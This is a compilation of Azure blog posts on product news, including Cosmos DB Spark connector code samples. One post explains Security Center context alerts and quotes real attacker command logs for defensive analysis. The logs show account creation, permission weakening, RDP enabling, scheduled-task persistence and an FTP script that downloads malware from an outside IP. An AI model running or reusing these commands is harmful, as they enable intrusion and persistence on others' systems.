#FuelMyAwesome Asks: What Gets You In the Code Zone?

#FuelMyAwesome is a salute to coding and creating. It’s a celebration of the awesome work you do, and the awesome ways you do it. A chance for us to recognize those of you who put all you’ve got into your apps, software, and games.

We want to know: What fuels your awesome? What favorite snack or music or ritual gets you cranking out that beautiful code? It’s easy to let us know, and there are prizes involved. Just jump on Twitter and tweet to @Azure, letting us know what gets you in the code zone with the hashtags #FuelMyAwesome and #sweepstakes. In return, we’ll be rewarding some of the most fun and intriguing responses with care packs full of Microsoft #FuelMyAwesome goodies.

More on how to enter and eligibility:

You must be a current follower of the @Azure handle on Twitter.
You must use the hashtags #FuelMyAwesome and #sweepstakes when tweeting to the @Azure Twitter handle about what fuels your awesome.
Twenty (20) winners will be selected each week during a six (6) week period. Entries are only eligible for one weekly period, and cannot roll over to the following week. You can enter each week at the end of each drawing period.
You may tweet with the hashtag #FuelMyAwesome as frequently as you wish, but multiple tweets within a week will not increase your chances of winning.
You must have an active Twitter account (create one for free at www.twitter.com).
You must be 18 years of age or older.
If you are 18 years of age or older but are considered a minor in your place of residence, you should ask your parent’s or legal guardian’s permission prior to entering the sweepstakes.
You must be a legal resident of the United States, residing in a location where sweepstakes are not prohibited.
You must not be an employee of Microsoft Corporation or an employee of a Microsoft subsidiary.
You have from June 7 to July 21 to enter—so get out there and tell us what gets your awesome going.

Check out the full Terms and Conditions, including winner selection and prize details, here. We can’t wait to see what fuels your awesome.
Quelle: Azure

Forrester report: What tech leaders are saying about cloud adoption

If your CEO asked about your progress moving to the cloud compared to other companies, would you know the answer? The "Benchmark Your Enterprise Cloud Adoption" report, published by Forrester Research, presents a wide-ranging look at strategies, priorities, and insights from infrastructure and technology leaders to help you assess and improve your cloud adoption initiatives.

Based on surveys of several thousand businesses, the report serves as a check-in for such topics as trends driving enterprise cloud demand, shifting attitudes toward cloud security, the prevalence of cost and usage monitoring, and the most popular platform options for starting a cloud adoption initiative. Along with the data, Forrester analysts also provide guidance such as these four strategies for growing cloud use at your company:

Connect with influencers
Make sure your cloud initiatives focus on the topics that are important to the people who are invested in their success, such as developers and business leaders.
Shift your metrics mindset
New performance metrics are required that align with business outcomes like speed, agility, flexibility, and autonomy, and tech leaders need to align themselves with that shift.
Know before you go
Before starting your cloud development or migration initiatives, evaluate your portfolio to identify the services that are the best candidates in terms of effort and impact.
New metrics mean new rewards
Rethink success in terms of speed and consistency, time to market, and meeting customer needs. That means not only encouraging technology management teams to standardize and automate, but rewarding them when they succeed.

Featuring peer-based benchmark survey data, this report will help you assess your company's move to the cloud, understand the approaches and priorities other tech leaders are using, and what should be at the top of your cloud priority list for 2017. Download your complimentary copy of "Benchmark Your Enterprise Cloud Adoption."

Quelle: Azure

Spark Connector for #CosmosDB – seamless interaction with globally-distributed, multi-model data

Today, we’re excited to announce that the Spark connector for Azure Cosmos DB is now truly multi-model! As noted in our recent announcement Azure Cosmos DB: The industry’s first globally-distributed, multi-model database service, our goal is to help you write globally distributed apps, more easily, using the tools and APIs you are already familiar with. Azure Cosmos DB’s database engine natively supports SQL (DocumentDB) API, MongoDB API, Gremlin (graph) API, and Azure Table storage API. With the updated Spark connector for Azure Cosmos DB, Apache Spark can now interact with all Azure Cosmos DB data models: Documents, Tables, and Graphs.

What is Azure Cosmos DB?

Azure Cosmos DB is Microsoft's globally distributed, multi-model database service for mission-critical applications. Azure Cosmos DB provides turn-key global distribution, elastic scale out of throughput and storage worldwide, single-digit millisecond latencies at the 99th percentile, five well-defined consistency levels, and guaranteed high availability, all backed by industry-leading, comprehensive SLAs. Azure Cosmos DB automatically indexes all data without requiring you to deal with schema and index management. It is multi-model and supports document, key-value, graph, and columnar data models. As a cloud-born service, Azure Cosmos DB is carefully engineered with multi-tenancy and global distribution from the ground up.

Perform Real-time Machine Learning on Globally-Distributed Data with Apache Spark and Azure Cosmos DB

The Spark connector for Azure Cosmos DB enables real-time data science, machine learning, advanced analytics and exploration over globally distributed data in Azure Cosmos DB. Connecting Apache Spark to Azure Cosmos DB accelerates our customer’s ability to solve fast-moving data science problems, where data can be quickly persisted and queried using Azure Cosmos DB. It efficiently exploits the native Azure Cosmos DB managed indexes and enables updateable columns when performing analytics.  It also utilizes push-down predicate filtering against fast-changing globally-distributed data addressing a diverse set of IoT, data science, and analytics scenarios.

Other use-cases of Azure Cosmos DB + Spark include:

Streaming Extract, Transformation, and Loading of data (ETL)
Data enrichment
Trigger event detection
Complex session analysis and personalization
Visual data exploration and interactive analysis
Notebook experience for data exploration, information sharing, and collaboration

The Spark Connector for Azure Cosmos DB uses the Azure DocumentDB Java SDK. You can get started today and download the Spark connector from GitHub!

Working with Azure Cosmos DB Tables

Azure Cosmos DB provides the Table API for applications that need a key-value store with flexible schema, with predictable performance and global distribution. Azure Table storage SDKs and REST APIs can be used to work with Azure Cosmos DB. Azure Cosmos DB supports throughput-optimized tables (informally called "premium tables"), currently in public preview.

To connect Apache Spark to the Azure Cosmos DB Table API, you can use the Spark Connector for Azure Cosmos DB as follows.

// Initialization
import com.microsoft.azure.cosmosdb.spark.schema._
import com.microsoft.azure.cosmosdb.spark._
import com.microsoft.azure.cosmosdb.spark.config.Config

val readConfig = Config(Map("Endpoint" -> "https://$tableContainer$.documents.azure.com:443/",
"Masterkey" -> "$masterkey$",
"Database" -> "$tableDatabase$",
"Collection" -> "$tableCollection$",
"SamplingRatio" -> "1.0"))

// Create collection connection
val tblCntr = spark.sqlContext.read.cosmosDB(readConfig)
tblCntr.createOrReplaceTempView("tableContainer")

Once you have connected to the Table, you can create a Spark DataFrame (in the preceding example, this would be tblCntr).

// Print tblCntr DataFrame Schema
scala> tblCntr.printSchema()
root
|– _etag: string (nullable = true)
|– $id: string (nullable = true)
|– _rid: string (nullable = true)
|– _attachments: string (nullable = true)
|– City: struct (nullable = true)
| |– $t: integer (nullable = true)
| |– $v: string (nullable = true)
|– State: struct (nullable = true)
| |– $t: integer (nullable = true)
| |– $v: string (nullable = true)
|– $pk: string (nullable = true)
|– id: string (nullable = true)
|– _self: string (nullable = true)
|– _ts: integer (nullable = true)

// Run Spark SQL query against your Azure Cosmos DB table
scala > spark.sql("select `$id`, `$pk`, City.`$v` as City, State.`$v` as State from tableContainer where City.`$v` = 'Seattle'").show()
+—-+—–+——-+—–+
| $id| $pk| City|State|
+—-+—–+——-+—–+
|John|Smith|Seattle| WA|
+—-+—–+——-+—–+

You will be able quickly and easily interact with your schema and execute Spark SQL queries against your underlying Azure Cosmos DB table.

Working with Azure Cosmos DB Graphs

Azure Cosmos DB provides graph modeling and traversal APIs along with turn-key global distribution, elastic scale out of storage and throughput, <10 ms read latencies and <15 ms at the 99th percentile, automatic indexing and query, tunable consistency levels, and comprehensive SLAs including 99.99% availability. Azure Cosmos DB can be queried using Apache TinkerPop's graph traversal language, Gremlin, with seamless integration with other TinkerPop-compatible graph systems like Apache Spark GraphX.

To connect Apache Spark to the Azure Cosmos DB Graph, you will use the Spark Connector for Azure Cosmos DB as follows.

// Initialization
import com.microsoft.azure.cosmosdb.spark.schema._
import com.microsoft.azure.cosmosdb.spark._
import com.microsoft.azure.cosmosdb.spark.config.Config

// Maps
val baseConfigMap = Map(
"Endpoint" -> "https://$graphContainer$.documents.azure.com:443/",
"Masterkey" -> "$masterKey$"
"Database" -> "$database$",
"Collection" -> "$collection$",
"SamplingRatio" -> "1.0",
"schema_samplesize" -> "1000"
)

val airportConfigMap = baseConfigMap ++ Map("query_custom" -> "select * from c where c.label='airport'")
val delayConfigMap = baseConfigMap ++ Map("query_custom" -> "select * from c where c.label='flight'")

// Configs
// get airport data (vertices)
val airportConfig = Config(airportConfigMap)
val airportColl = spark.sqlContext.read.cosmosDB(airportConfig)
airportColl.createOrReplaceTempView("airportColl")

// get flight delay data (edges)
val delayConfig = Config(delayConfigMap)
val delayColl = spark.sqlContext.read.cosmosDB(delayConfig)
delayColl.createOrReplaceTempView("delayColl")

Here, we have created Spark DataFrames – one for the airport data (which are the vertices) and one for the flight delay data (which are the edges). The graph we have stored in Azure Cosmos DB can be visually depicted as in the figure below, where the vertexes are the blue circles representing the airports and the edges are the black lines representing the flights between those cities.  In this example, the originating city for those flights (edges) is Seattle (blue circle top left of map where all the edges are originating from).

Figure: Airport D3.js visualization of airports (blue circles) and edges (black lines) which are the flights between the cities.

Benefit of Integrating Cosmos DB  Graphs with Spark

One of the key benefits of working with Azure Cosmos DB graphs and Spark connector is that Gremlin queries and Spark DataFrame (as well as other Spark queries) can be executed against the same data container (be it a graph, a table or a collection of documents).  For example, below are some simple Gremlin Groovy queries against this flights graph stored in our Azure Cosmos DB graph.

,,,/
(o o)
—–oOOo-(3)-oOOo—–
plugin activated: tinkerpop.server
plugin activated: tinkerpop.utilities
plugin activated: tinkerpop.tinkergraph
gremlin> :remote connect tinkerpop.server conf/remote-secure.yaml
==>Configured tychostation.graphs.azure.com/52.173.137.146:443

gremlin> // How many flights into each city leaving SEA
==>true
gremlin> :> g.V().has('iata', 'SEA').outE('flight').inV().values('city').groupCount()
==>[Chicago:1088,New York:432,Dallas:800,Miami:90,Washington DC:383,Newark:345,Boston:315,Orlando:116,Philadelphia:193,Fort Lauderdale:90,Minneapolis:601,Juneau:180,Ketchikan:270,Anchorage:1097,Fairbanks:260,San Jose:611,San Francisco:1698,San Diego:617,Oakland:798,Sacramento:629,Los Angeles:1804,Orange County:569,Burbank:266,Ontario:201,Palm Springs:236,Las Vegas:1204,Phoenix:1228,Tucson:90,Austin:90,Denver:1231,Spokane:269,San Antonio:90,Salt Lake City:860,Houston:568,Atlanta:521,St. Louis:90,Kansas City:95,Honolulu, Oahu:415,Kahului, Maui:270,Lihue, Kauai:128,Long Beach:345,Detroit:244,Cincinnati:4,Omaha:90,Santa Barbara:90,Fresno:142,Colorado Springs:90,Portland:602,Jackson Hole:13,Cleveland:6,Charlotte:169,Albuquerque:105,Reno:90,Milwaukee:82]

gremlin> // SEA -> Reno flight delays
==>true
gremlin> :> g.V().has('iata', 'SEA').outE('flight').as('e').inV().has('iata', 'RNO').select('e').values('delay').sum()
==>963

The preceding code connects to the tychostation graph (tychostation.graphs.azure.com) to run the following Gremlin Groovy queries:

Using graph traversal and groupCount(), determines the number of flights originating from Seattle to the listed destination cities (e.g. there are 1088 flights from Seattle to Chicago) in this dataset).
Using graph to determine the total delay (in minutes) of the 90 flights from Seattle to Reno (i.e. 963 minutes of delay).

With the Spark connector using the same tychostation graph, we can also run our own Spark DataFrame queries. Following up from the preceding Spark connector code snippet, let’s run our Spark SQL queries – in this case we’re using the HDInsight Jupyter notebook service.

Top 5 destination cities departing from Seattle

%%sql
select a.city, sum(f.delay) as TotalDelay
from delays f
join airports a
on a.iata = f.dst
where f.src = 'SEA' and f.delay < 0
group by a.city
order by sum(f.delay) limit 5

Calculate median delays by destination cities departing from Seattle

%%sql
select a.city, percentile_approx(f.delay, 0.5) as median_delay
from delays f
join airports a
on a.iata = f.dst
where f.src = 'SEA' and f.delay < 0
group by a.city
order by median_delay

With Azure Cosmos DB, you can use both Apache Tinkerpop Gremlin queries AND Apache Spark DataFrame queries targeting the same graph.

Working with Azure Cosmos DB Document data model

Whether you are using the Azure Cosmos DB graph, table, or documents, from the perspective of the Spark Connector for Azure Cosmos DB, the code is the same!  Ultimately, the template to connect to any of these data models is noted below:

Configure your connection.
Build your config and DataFrame.
And voila – Apache Spark is working in tandem with Azure Cosmos DB.

// Initialization
import com.microsoft.azure.cosmosdb.spark.schema._
import com.microsoft.azure.cosmosdb.spark._
import com.microsoft.azure.cosmosdb.spark.config.Config

// Configure your connection
val baseConfigMap = Map(
"Endpoint" -> "https://$documentContainer$.documents.azure.com:443/",
"Masterkey" -> "$masterKey$"
"Database" -> "$database$",
"Collection" -> "$collection$",
"SamplingRatio" -> "1.0",
"schema_samplesize" -> "1000"
)

// Build config and DataFrame
val baseConfig = Config(baseConfigMap)
val baseColl = spark.sqlContext.read.cosmosDB(baseConfig)

And, with the Spark Connector for Azure Cosmos DB, data is parallelized between the Spark worker nodes and Azure Cosmos DB data partitions.  Therefore, whether your data is stored in the Tables, Graph, or Documents, you will get the performance, scalability, throughput, and consistency all backed by Azure Cosmos DB when you are solving your Machine Learning and Data Science problems with Apache Spark.

Next Steps

In this blog post, we’ve looked at how Spark Connector for Azure Cosmos DB can seamlessly interact with multiple data models supported by Azure Cosmos DB. Apache Spark with Azure Cosmos DB enables both ad-hoc, interactive queries on big data, as well as advanced analytics, data science, machine learning and artificial intelligence. Azure Cosmos DB can be used for capturing data that is collected incrementally from various sources across the globe. This includes social analytics, time series, game or application telemetry, retail catalogs, up-to-date trends and counters, and audit log systems. Spark can then be used for running advanced analytics and AI algorithms at scale and globally on top of the data living in Azure Cosmos DB.  With Azure Cosmos DB being the industry’s first globally distributed multi-model database service, the Spark connector for Azure Cosmos DB can work with tables, graphs, and document data models – with more to come!

To get started running queries, create a new Azure Cosmos DB account from the Azure portal and work with the project in our Azure-CosmosDB-Spark GitHub repo.

Stay up-to-date on the latest Azure Cosmos DB news and features by following us on Twitter @AzureCosmosDB and #CosmosDB and reach out to us on the developer forums on Stack Overflow.
Quelle: Azure

Azure Post Exploitation Techniques

The Cloud and Enterprise Red Team introduced how to apply traditional network attack techniques to the cloud along with mindset trends seen in Azure to address them. The presentation was given at the Infiltrate 2017 conference and is now available online.

Presentation

Cloud Post Exploitation Technique

Presenters  – @sachafaust and @andrewjohnson, Red Team, Cloud & Enterprise

Quelle: Azure

New language support for Azure Media Indexer v2

Speech to text has been one of the most exciting Azure Media Services components since the original release of Azure Media Indexer in 2014.

Today we are ready to release the following new languages to the "Azure Media Indexer 2 Preview" Media Processor: Russian, British English, and Mexican Spanish.

Currently we support the following languages:

(new) Russian [RuRu] 
(new) British English [EnGb] 
(new) Mexican Spanish [EsMx] 
English [EnUs]
Spanish [EsEs]
Chinese (Mandarin, Simplified) [ZhCn]
French [FrFr]
German [DeDe]
Italian [ItIt]
Portuguese [PtBr]
Arabic (Egyptian) [ArEg]
Japanese [JaJp]

In order to run a task against media containing speech in the Russian language, use the following task preset:

{
'Version': '1.0',
'Features': [{
'Options': {
"Language": "RuRu"
}
}]
}

Feel free to swap out the language parameter for any of the supported languages in the list above.

Still not sure what Azure Media Indexer 2 is? Read the introductory blog post to learn how to extract the speech content from your media files.

Want to get started? Check out the official documentation.

To learn more about Azure Media Analytics, check out the introductory blog post.

Have feedback? Share it on our feedback forum.

 
Quelle: Azure

Diagnose sudden changes in your app behavior with a click!

Spikes or steps in the telemetry of your app can now be easily diagnosed.

When you use Application Insights Analytics to explore app metrics over time, sudden changes, such as spikes or dips, are highlighted. With one click, Smart Diagnostics will find a pattern (a series of data with common values) that correlates with the change, and explain the reason behind it.

After you’ve created a time chart that includes an unusual change, click a highlighted data point. Smart Diagnostics finds a filter pattern that explains the data discontinuity – it identifies the pattern in which the discrepancy occurs, isolates it, and displays the result with and without the filter:

In this example, a new release of an app caused a sudden rise in the exception rate. Smart Diagnostics found a filter that characterized the change: The additional errors occur when users view a particular URL with a particular combination of browser version and client operating system. Smart Diagnostics displays the result with the filter false and true, so that you can easily see how strongly the change depends on the filter. In this case, with other combinations of URL, browser, or OS, the background trend continues as it was before, while all the additional errors are attributable to the problem values.

This information helps you focus your investigation on the root cause of the issue.

Want to know more?

Learn more about Smart Diagnostics in Analytics.
See a demonstration of Smart Diagnostics on sample data.
Watch Smart Diagnostics short video.

Smart Diagnostics is currently in preview, and we’re very keen to get your feedback – just click the smiley face icon at Smart Diagnostics results tab, or at top right of the Analytics window.
Quelle: Azure

HDInsight tools for IntelliJ May updates

The primary focus for our May updates is to make the Spark development work easier for you in IntelliJ! In this release, your spark remote debugging experience is significantly improved. Scala SDKs Installation, Scala project creation, and Spark Job submission are also simplified. You can now use IntelliJ “run as” or “debug as” for Spark job submission and debugging. You can also load Spark job configuration from local property file now. The key updates are summarized in the following.

Simplified Scala project creation

The installation and Scala project creation processes are simplified greatly through on demand Scala Plugin installation and the Scala SDKs auto download during Scala project creation. To learn more please watch our demo Create Spark Scala Applications.

1. The Scala project creation wizard now checks whether Scala plugin is installed, and then it will help you to search and install the Scala plugin for the first time.

2. Previously you needed to specify the Spark version, find the corresponding Scala SDK version, and download the Scala SDK manually. Now you only need to specify the Spark version during project creation, the corresponding Scala SDKs, and libraries are auto downloaded. Please note that the Spark version you choose here should match your Spark cluster version.

Improved Spark remote debugging

We have developed a super cool remote debugging feature which allows you to run and debug Spark application remotely on a HDInsight cluster anytime. To learn more please watch our demo HDInsight Spark Remote Debugging.

The initial configuration to connect to your HDInsight Spark cluster for remote debugging is as simple as a few clicks which are outlined in the following:

To configure Spark remote debugging, go to IntelliJ “Run” menu -> “Edit Configurations” -> new “Submit Spark Job” configuration. You are asked to enter information including Spark cluster, artifact, and main class name as shown below.

By clicking “Advanced configuration”, you can “Enable Spark remote debug”, and specify SSH user name, password, or private key file as shown below.

IntelliJ “run as” / “debug as” integration

You can either go to IntelliJ “Run” menu -> “Edit Configurations” –> click new “Submit Spark Job”, or right click the project and then choose “Submit Spark Job” to submit your Spark job.

You can customize the configuration, such as cluster, main class, artifact, and so on. 

You can use IntelliJ “run” or “debug” in menu, click the run icon, or the debug icon (as shown below) in the toolbar to start Spark remote debugging session.      

You can also set up a breakpoint, edit the application, step through the code, and resume the execution while you are performing remote debugging.

Load Job Configuration

In the Spark submission window, you can now load job configuration from local property file by clicking the “browse” button besides “Job configuration”, as shown below.

How to install/update

You can get the latest bits by going to IntelliJ repository, and searching “Azure Toolkit.” IntelliJ will also prompt you for the latest update if you have already installed the plugin.

 

For more information, check out the following:

IntelliJ User Guide: Use HDInsight Tools in Azure Toolkit for IntelliJ to create Spark applications for HDInsight Spark Linux cluster
IntelliJ HDInsight Spark Local Run: Use HDInsight Tools for IntelliJ with Hortonworks Sandbox   
Create Scala Project (Video): Create Spark Scala Applications 
Remote Debug (Video): Use Azure Toolkit for IntelliJ to debug Spark applications remotely on HDInsight Cluster

Learn more about today’s announcements on the Azure blog and Big Data blog.

Discover more Azure service updates.

If you have questions, feedback, comments, or bug reports, please use the comments below or send a note to hdivstool@microsoft.com.
Quelle: Azure

Azure Security Center adds Context Alerts to aid threat investigation

In two recent articles Greg Cottingham and Jessen Kurien described investigation processes triggered by a security alert. If you haven't already done so, please read “How Azure Security Center helps reveal a Cyberattack” and “How Azure Security Center detects a Bitcoin mining attack.” This post will make a lot more sense if you've read them. In these articles, the authors describe how background information from logs helped to provide a deeper understanding of the attack. Once understood, an appropriate set of remediation actions could be identified to block the security intrusion and prevent similar incidents reoccurring.

This kind of investigation process is often difficult for customers to replicate. It requires a lot of expertise to know what to look for. Most companies don’t have security experts like Greg and Jessen on their payrolls, and from all reports, they are very expensive to hire! The process is also time-consuming, often needing hours or even days of following hints, crafting and tweaking queries, and interpreting data in order to pinpoint the attacker’s activity.

To try to address this, we recently deployed a new type of alert. This alert automates some aspects of security investigation work and tries to deliver more relevant context to the customer about what else was happening on the system during and immediately before the attack. The context gathering is triggered whenever a security detection alert is reported. If any relevant context is found, it is reported in a follow-up “suspicious behavior” alert.

Example from Azure Security Portal

Let’s review one of these alerts to get a feel for what they contain and how they can help you get a fuller picture of the context surrounding a security alert. The context alerts have the snappy title, “Potentially suspect behavior reported as extra context for other alerts.”

The context alert shown above has been annotated with some explanation. It is showing the result of three separate context queries compiled into a time-ordered list of potentially interesting events near the time of the original alert.

Although we present the event data in summarized form, you may find it easier to see what is going on if you copy the contents of the CONTEXTEVENTACTIVITY field and paste into a text editor. For most process execution events you will see the following items in each line, the time that the process was run, process name, process command line, repetition times or count, and report category, typically "UnusualProcess" or "RDPLogon". The repetition field tells you if an identical event was repeated at a different time; if there are three or fewer repetitions the times are recorded, if more than 3 a simple count of repetitions is included.

Only a minority of alerts result in a context report. This is because we are explicitly looking for suspicious behavior and don’t create a report if we don’t find any. The types of behavior that we look for are unusual commands being executed and unusual patterns of execution. These are usually not sufficiently suspicious to trigger an alert in themselves but, in the context of a positive alert from one of our security detections, they can provide important corroborating evidence. When viewed alongside the originating alert they can give you a much fuller picture of what was happening during the attack.

How does it work?

As note earlier, when Azure Security Center alerts on a new detection the context service is triggered to try to answer some of the same questions a human investigator would ask about the alert. For example, "Were any other unusual processes run in this logon session?" or "Who recently logged on to this virtual machine?” Different data sources and jobs are chosen depending on the type of alert and the data items available in the alert. For example, if the alert contains user account details, we might use that to look up what else that was run in the same account session around the time of the alert. Any relevant data from these queries is output as a Suspicious Behavior context alert in Azure Security Center.

Case studies

Here is an example like the attack seen in Greg's earlier post. The context report was triggered by the alert “Detected suspicious use of Cacls to lower the security state of the system.” The resulting context report combines output from three different context jobs into a time-ordered set of events. Note that I’ve stripped out some of the detail to reduce repetition and make it easier to read.

Alert Description: "Related alert (dated 2017-04-21 09:37:47Z). 4 items in report (Unusual processes executed, RDP Logons, Supplemental processes executed, Unusual multi-processes commandline execution)",
ContextEventActivity:
00:47:44Z xxxxxxUser 175.143.245.210 (RDPLogon)
09:37:26Z "C:windowssystem32ftp.exe" -s:C:WINDOWSsystem32us.dat
09:37:32Z ftp -s:xpoffice.exe
09:37:32Z ftp -s:c:RECYCLERxpoffice.exe
09:37:33Z ftp -s:c:xpoffice.exe
09:37:45Z "C:WindowsSystem32net.exe" stop CryptSvc
09:37:45Z "C:WindowsSystem32regsvr32.exe" urlmon.dll shdocvw.dll jscript.dll vbscript.dll /s
09:37:45Z "C:WindowsSystem32cacls.exe" C:Windowssystem32wscript.exe /e /t /g SYSTEM:F
[removed some items for brevity]…
09:37:46Z "C:WindowsSystem32cacls.exe" C:Windowssystem32cscript.exe /e /t /g SYSTEM:F
09:37:46Z "C:WindowsSystem32cacls.exe" C:Windowssystem32iasias.mdb /e /t /g SYSTEM:F
09:37:46Z "C:WindowsSystem32net.exe" localgroup administrators abai$/add
09:37:46Z "C:WindowsSystem32net.exe" user www.401hk.com Www.401hk.com$
09:37:46Z "C:WindowsSystem32net.exe" user www.401hk.com/active:yes
09:37:46Z "C:WindowsSystem32reg.exe" ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"
[Report truncated…maximum number of items exceeded]

While not every event list may be related to the attack, in the above event trace we can see the following activities:

An RDP logon that in this case probably unrelated.
Unusual execution of scripted FTP commands.
Shutting down the Windows Crypto service.
Registration of scripting DLLs. These are not typically registered on a server, but are obviously needed by the attack.
Setting permissions on cscript and wscript executables.
Creating new user accounts.
Removing restrictions from Terminal Services (RDP) logons.

Sadly, at this point we run out of space to follow the full extent of the attack, but even from this snippet of 30 items, minus the ones deleted to save space, it is fairly clear that something unusual and unwanted is going on. A further final clue is the timing of these events. A whole series of otherwise unrelated processes executed within the same minute is a clear sign of a scripted attack.

This is another interesting variant of a similar attack pattern, with expletives edited out, based on an Unusual process execution detected alert.

11:44:09Z "C:WindowsSystem32regini.exe" c:windowssystem3225run.ini
11:44:09Z "C:WindowsSystem32regini.exe" c:windowssystem3225runq.ini
11:44:16Z "C:WindowsSystem32SecEdit.exe" /configure /cfg "C:WINDOWSsystem32NewAuto.inf" /db newdb.sdb /log logfile.txt /areas REGKEYS FILESTORE
11:44:16Z "C:WindowsSystem32SecEdit.exe" /configure /db secedit.sdb /cfg NewAuto.inf
11:44:16Z "C:WindowsSystem32SecEdit.exe" /configure /db secedit.sdb /cfg F***Gothin.inf
11:44:28Z "C:WindowsSystem32cacls.exe" cmd.exe /e /t /g system:f
11:44:28Z "C:WindowsSystem32cacls.exe" ftp.exe /e /t /g system:f
11:44:29Z "C:WindowsSystem32cacls.exe" net.exe /e /t /g system:f
11:44:29Z "C:WindowsSystem32cacls.exe" net1.exe /e /t /g system:f
11:44:29Z "C:WindowsSystem32cacls.exe" wscript.exe /e /t /g system:f
11:44:29Z "C:WindowsSystem32cacls.exe" cscript.exe /e /t /g system:f
11:44:49Z "C:WindowsSystem32net.exe" stop CryptSvc
11:44:50Z "C:WindowsSystem32regsvr32.exe" urlmon.dll shdocvw.dll jscript.dll vbscript.dll /s [Repeats: 11:44:50.82]
11:45:01Z "C:WindowsSystem32ftp.exe" -s:C:MG05.dll
11:45:02Z "C:WindowsSystem32schtasks.exe" /create /tn "45645" /tr "c:Ttqlhcjntzllto.exe" /sc minute /mo 1 /ru "system
11:45:03Z "C:Windowssystem32cmd.exe" /c net1 stop sharedaccess&echo open 222.184.79.11 > MG06.dll&echo mix>> MG06.dll&echo mix>> MG06.dll&echo binary >> MG06.dll&echo get Ttqlhcjntzllto.exe >> MG06.dll&echo bye >> MG06.dll&ftp -s:MG06.dll&p -s:MG06.dll&Ttqlhc….
11:45:03Z ftp -s:MG06.dll

This shows using regini.exe to perform bulk registry edits, using secedit.exe to change system security, and creating a scheduled to task, most likely to secure a permanent foothold on the machine. The last two lines show using cmd.exe redirection to create an ftp script and then executing the script to download a piece of malware, Ttqlhcjntzllto.exe. In the previous line, third from last, this executable is installed as a scheduled task. Although this appears to be out-of-order, this is because attack scripts are often run repeatedly to give them better chance of completing successfully so we're probably seeing a snapshot containing the beginning and end of two executions of this script.

What’s next

Although these reports already provide valuable context for an alert we will continue to refine this, expanding the kinds of data included and working on ways to make the output smarter.

To learn more

See other blog posts with real-world examples of how Azure Security Center helps detect cyberattacks — How Azure Security Center helps reveal a Cyberattack and How Azure Security Center detects a Bitcoin mining attack.
Azure Security Center detection capabilities — Learn about Azure Security Center’s advanced detection capabilities.
Managing and responding to security alerts in Azure Security Center — Learn how to manage and respond to security alerts.
Azure Security Center FAQ — Find frequently asked questions about using the service.

Quelle: Azure

Azure SQL Data Sync Refresh

We are happy to announce our Azure SQL Data Sync Refresh! With Azure SQL Data Sync users can easily synchronize data bi-directionally between multiple Azure SQL databases and/or on-premises SQL Databases. This release includes several major improvements to the service including new Azure portal support, PowerShell and REST API support, and enhancements to security and privacy.

This update will be available for selected existing Data Sync customers starting June 1st. It will be available for all customers by June 15th. Please email us with your subscription ID if you’d like early access. 

What’s new?

Data Sync on the new Azure portal

Data Sync is now available in the new Azure portal for select internal customers. This will be available for all customers in mid-June. You can now manage Data Sync in the same place you manage all your other Azure resources. Data Sync will be retired from the old portal after June 1, 2017.

PowerShell programmability and REST APIs

Previously in Data Sync, creating Sync groups and making changes had to be done manually through the UI. This could be a tedious, time consuming process, especially in complex Sync topologies with many member databases or Sync groups. Starting in July Data Sync will support PowerShell and REST APIs which developers can leverage to make these tasks faster and easier. This is also great for the many users who are comfortable with and prefer using PowerShell. 

Better security, better privacy, better resilience

In the previous design, Data Sync used a central shared database for each region to manage the Sync operations. Now each user will have dedicated user owned Sync Databases. A Sync Database is a customer owned Azure SQL Database. By replacing the shared central databases with customer-specific databases, we provide better privacy and security. In addition, this provides the user flexibility to increase or decrease the performance tier of the Sync Database based on their needs.

Sync Database Requirements

Azure SQL Database of any service tier
Same region as the Hub Database of a Sync Group(s)
Same subscription as Sync Group(s)
One per region in which you have a Sync Group (Hub Database)

Enhanced monitoring and troubleshooting

We have made a few key improvements to monitoring and troubleshooting. Users can now monitor the sync status programmatically using PowerShell and RESTful APIs. In addition, we’ve improved several error messages, making them more clear and actionable.

Next steps

New users

If you would like to try Data Sync refer to this tutorial.

Existing users

Existing users will be migrated to the new service starting June 1, 2017. For more information on migration look at the blog post “Migrating to Azure SQL Data Sync 2.0.”

More resources

Getting Started with Data Sync
Migrating to Data Sync 2.0
Azure Forums
PowerShell Script Link
Link to CSS

Going forward

We will continue to add features and make improvements to Data Sync as we work towards General Availability. Please ask any questions in the Azure SQL Database forums and post feedback in User Voice. We greatly appreciate any feedback.
Quelle: Azure

Protect Windows Server System State to cloud with Azure Backup!

One of the key endeavors of the cloud-first approach of Azure Backup is to empower enterprises to recover from security attacks, corruptions, disasters, or data loss situations quickly, securely, and reliably.  Restoring servers efficiently in the wake of evolving IT threats involves going beyond recovering data alone from backups. Our customers have expressed varying degrees of complexity in how their operating systems and applications are configured. Restoring this dynamic configuration captured in the form of the Windows Server System State, in addition to data, with minimum infrastructure, forms a critical component of disaster recovery.

Today we are extending the data backup capabilities of the Azure Backup agent to enable customers to perform comprehensive, secure, and reliable Windows Server recoveries. We are excited to preview the support for backing up Windows Server System State directly to Azure with Azure Backup.

Azure Backup will now integrate with the Windows Server Backup feature that is available natively on every Windows Server and provide seamless and secure backups of your Windows Server System State directly to Azure without the need to provision any on-premises infrastructure.

Value proposition

Comprehensive Protection for Active Directory, File-Servers and IIS Web servers: Active Directory (AD) is the most critical database of any organization and therefore requires a backup strategy that allows for reliable recoveries during critical scenarios. System State of a domain-controller server captures the Active Directory and files that are required for domain-controller synchronization and allow for targeted Active Directory protection and restores.
On a File Server, System State captures important file-cluster configurations and policies that protect files from unauthorized access. Combined with file-folder backup, the backup of System State with Azure Backup agent provides the ability to comprehensively recover File Servers.
On an IIS Web Server, System state captures the IIS Metabase that contains crucial configuration information about the server, the site and even files and folders and therefore is the recommended option to restore Web Servers.
Cost-Effective Offsite for Disaster Recovery: System State for most Windows Servers is less than 50 GBs in size. For that size, at $5 a month and pay-as-you-go Azure storage, Azure Backup eliminates all infrastructure and licensing costs, and enables you to protect your Windows Server System State for reliable restores. No need to provision local hard-drives, or offsite storage, or employ additional tools or servers to manage system state backups and ensure their off-siting. Azure Backup takes care of off-siting System State on a specified schedule to Azure!
Secure Backups: The enhanced security features built into Azure Backup and data-resilience offered by Azure ensure that your critical system state backups remain secure from malicious attacks, corruptions, and deletions.
Flexible Restores: With Azure Backup’s Restore-as-a-Service, you can restore System State files from Azure without any egress charges. Additionally, you can apply System State to your Windows Servers at your convenience using the native Windows Server Backup utility.
Single management pane in Azure: With Azure Backup’s Restore-as-a-Service, you can restore System State files from Azure without any egress charges. Additionally, you can apply System State to your Windows Servers at your convenience using the native Windows Server Backup utility.

